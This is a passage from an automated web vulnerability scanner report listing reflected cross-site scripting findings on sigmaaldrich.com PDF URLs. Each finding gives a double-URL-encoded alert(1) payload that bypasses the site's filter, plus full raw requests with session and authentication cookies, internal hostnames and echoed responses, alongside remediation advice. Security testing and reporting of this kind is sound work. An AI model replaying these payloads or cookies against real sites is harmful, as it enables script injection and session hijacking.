Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma8f05b%2522%253balert%25281%2529%252f%252f3afd928ea16/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:13 GMT
Content-Length: 28991
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma8f05b";alert(1)//3afd928ea16/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.319. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da5ff%2522%253balert%25281%2529%252f%252f88785618ad6 was submitted in the REST URL parameter 5. This input was echoed as da5ff";alert(1)//88785618ad6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Informationda5ff%2522%253balert%25281%2529%252f%252f88785618ad6/proteomics.Par.0001.File.tmp/proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:19 GMT
Content-Length: 28991
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Informationda5ff";alert(1)//88785618ad6/proteomics.Par.0001.File.tmp/proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.320. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea339%2522%253balert%25281%2529%252f%252f628160786bc was submitted in the REST URL parameter 6. This input was echoed as ea339";alert(1)//628160786bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information/ea339%2522%253balert%25281%2529%252f%252f628160786bc/proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:24 GMT
Content-Length: 28963
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information/ea339";alert(1)//628160786bc/proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.321. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 991ab%2522%253balert%25281%2529%252f%252f5830c9f5f6c was submitted in the REST URL parameter 1. This input was echoed as 991ab";alert(1)//5830c9f5f6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc991ab%2522%253balert%25281%2529%252f%252f5830c9f5f6c/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:55 GMT
Content-Length: 29015
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc991ab";alert(1)//5830c9f5f6c/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.322. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e73d9%2522%253balert%25281%2529%252f%252fdda435ba345 was submitted in the REST URL parameter 2. This input was echoed as e73d9";alert(1)//dda435ba345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibe73d9%2522%253balert%25281%2529%252f%252fdda435ba345/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:02 GMT
Content-Length: 29015
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibe73d9";alert(1)//dda435ba345/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.323. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b06d%2522%253balert%25281%2529%252f%252fa426dcb6558 was submitted in the REST URL parameter 3. This input was echoed as 3b06d";alert(1)//a426dcb6558 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

